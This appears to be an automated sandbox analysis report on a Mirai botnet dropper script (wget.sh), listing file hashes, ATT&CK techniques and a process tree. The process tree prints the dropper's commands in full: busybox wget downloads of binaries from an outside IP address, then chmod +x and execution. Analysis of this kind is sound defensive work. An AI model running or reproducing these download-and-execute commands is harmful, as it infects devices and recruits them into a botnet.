mirai | 8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0

Analysis

max time kernel
19s
max time network
117s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
10/03/2025, 22:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wget.sh
Size

1KB
MD5

fe3891afe068ca6fc86017361dfb753c
SHA1

d631b6a4eaa99085df4260727c2c86dc82cf5428
SHA256

8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0
SHA512

810560af118bf04a2723fb177bbdf25682e3cb8b95611e15c8d83576305ea41ba11dec0d42c410fc5b287cb8a31901f9190946e957ac8deb8c0d634a42334951

Score

10^/10

mirai botnet botnet defense_evasion

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
723	busybox
738	busybox
749	busybox
755	busybox

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/jklarm	725	wget.sh
/tmp/jklarm5	739	wget.sh
/tmp/jklarm6	750	wget.sh
/tmp/jklarm7	756	wget.sh

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/jklarm	busybox
File opened for modification	/tmp/jklarm5	busybox
File opened for modification	/tmp/jklarm6	busybox
File opened for modification	/tmp/jklarm7	busybox

/tmp/wget.sh
/tmp/wget.sh
1⤵
- Executes dropped EXE
PID:712
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm -O jklarm
  2⤵
  - Writes file to tmp directory
  PID:713
- /bin/busybox
  /bin/busybox chmod +x jklarm
  2⤵
  - File and Directory Permissions Modification
  PID:723
- /tmp/jklarm
  ./jklarm telnet
  2⤵
  PID:725
- /bin/busybox
  /bin/busybox rm -rf jklarm
  2⤵
  PID:728
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm5
  2⤵
  - Writes file to tmp directory
  PID:730
- /bin/busybox
  /bin/busybox chmod +x jklarm5
  2⤵
  - File and Directory Permissions Modification
  PID:738
- /tmp/jklarm5
  ./jklarm5 telnet
  2⤵
  PID:739
- /bin/busybox
  /bin/busybox rm -rf jklarm5
  2⤵
  PID:741
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm6
  2⤵
  - Writes file to tmp directory
  PID:743
- /bin/busybox
  /bin/busybox chmod +x jklarm6
  2⤵
  - File and Directory Permissions Modification
  PID:749
- /tmp/jklarm6
  ./jklarm6 telnet
  2⤵
  PID:750
- /bin/busybox
  /bin/busybox rm -rf jklarm6
  2⤵
  PID:753
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm7
  2⤵
  - Writes file to tmp directory
  PID:754
- /bin/busybox
  /bin/busybox chmod +x jklarm7
  2⤵
  - File and Directory Permissions Modification
  PID:755
- /tmp/jklarm7
  ./jklarm7 telnet
  2⤵
  PID:756
- /bin/busybox
  /bin/busybox rm -rf jklarm7
  2⤵
  PID:758
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k
  2⤵
  PID:759

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jklarm

Filesize
60KB

MD5
35c215d8e2b2ea03a8a191fb3723195a

SHA1
c38bcfc3d7050edeff1b7dbffd85d07348bb01e9

SHA256
c4fd68b20997f3c8a60dbadf177b3309d465f0a8bb0ad9b33b4c70ee74dc3a90

SHA512
ea5a9fda95965b6eb55c47eefe2b42a9234d13c8d05556e72e916f98a626a0a835fa7f7828d4051b6056d639b06bec0136afa9ac3157736702b94c0ed9effdf8

Download Submit
/tmp/jklarm5

Filesize
60KB

MD5
a04040c769cad786555e183ba8ae0ca0

SHA1
a89d6b50a8140dddce29595c64949214e65c84f1

SHA256
7568e9e64ac1105cdcae20095154214ee943b2edc6c01e6d4b4eb0b7e06255a3

SHA512
e152f552b99683b3bf9b9fee2f7d34027a291e02dd2f912620593e714774cfe07e14aa837cdb2f2a300d35b721dfd67e7012955e24352bdad0ffecb4e61ed162

Download Submit
/tmp/jklarm6

Filesize
69KB

MD5
9e18604aa4c5bedd6e9ea6690b751880

SHA1
c1f32fe93aa650f9920fc5bd659d23621ab034a2

SHA256
41342a887d2be09cf0165913b43a5916492e677d20429068d4829a090453ccbb

SHA512
cdafb3281bcaa5f5c1af71df8d53c2d022de72a559dfea513b41bc08c7d8fe421839cfdc51b3f93f501bb62d02924e3047208e8bce3a8768af2404f3caa767b0

Download Submit
/tmp/jklarm7

Filesize
82KB

MD5
a9675614a267473cb83e195d9074a067

SHA1
a4d148cf841fc2b84c8bb3dd322e40f601532875

SHA256
fe4e8d464b7849a5483782d0c47e53deaf199e284badad12ed98ca79e47a79d9

SHA512
8adcc5df013328218823d3310bcc4f27f6e1e9e51de2e7ecd5521873f5ac6cc2315f9136e1599f1da4114e65eaed23449e78f9ce04062243aa8ec793086b1c28

Download Submit